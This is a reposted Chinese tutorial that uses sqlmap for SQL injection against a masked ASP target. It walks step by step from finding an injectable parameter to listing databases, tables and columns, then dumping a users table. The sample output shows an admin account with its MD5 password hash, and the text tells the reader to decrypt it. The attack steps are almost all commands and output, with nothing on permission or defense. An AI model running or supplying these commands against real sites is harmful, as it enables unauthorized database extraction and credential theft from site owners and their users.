2.sqlmap学习笔记之MySQL注入

首页 > 代码库 > 2.sqlmap学习笔记之MySQL注入

2.sqlmap学习笔记之MySQL注入

2024-08-03 20:04:04 212人阅读

1.判断一个url是否存在注入点：

   .sqlmap.py -u "http://abcd****efg.asp?id=7" -dbs

假设找到数据库:student

 ------------------------------  available databases[1]  [*] student ------------------------------

2.获取数据库中的表名：

   .sqlmap.py -u "http://abcd****efg.asp?id=7" -D student --tables

假设找到表名：users

   -----------------------  [INFO] retrieved:users   -----------------------

3.获取表中的字段名：

  .sqlmap.py -u "http://abcd****efg.asp?id=7" -D student -T users --columns

假设获取出字段为：id username password

---------------------------------  [INFO] retrieved:       id  [INFO] retrieved:       int(3)  [INFO] retrieved:       username  [INFO] retrieved:       varchar(30)  [INFO] retrieved:       password  [INFO] retrieved:       varchar(30)----------------------------------

4.猜字段内容：

    .sqlmap.py -u "http://abcd****efg.asp?id=7" -D student -T users -C id,username,password --dump

获取结果：

  [INFO] retrieved:       1  [INFO] retrieved:       admin  [INFO] retrieved:       21232f297a57a5a743894a0e4a801fc3  (32位MD5加密密文)

账号：admin 密码:将密文解密即可。

2.sqlmap学习笔记之MySQL注入

声明：以上内容来自用户投稿及互联网公开渠道收集整理发布，本网站不拥有所有权，未作人工编辑处理，也不承担相关法律责任，若内容有误或涉及侵权可进行投诉：投诉/举报工作人员会在5个工作日内联系你，一经查实，本站将立刻删除涉嫌侵权内容。

联系
我们

首页 > 代码库 > 2.sqlmap学习笔记之MySQL注入

2.sqlmap学习笔记之MySQL注入

看完仍有疑问？有类似问题直接问程序猿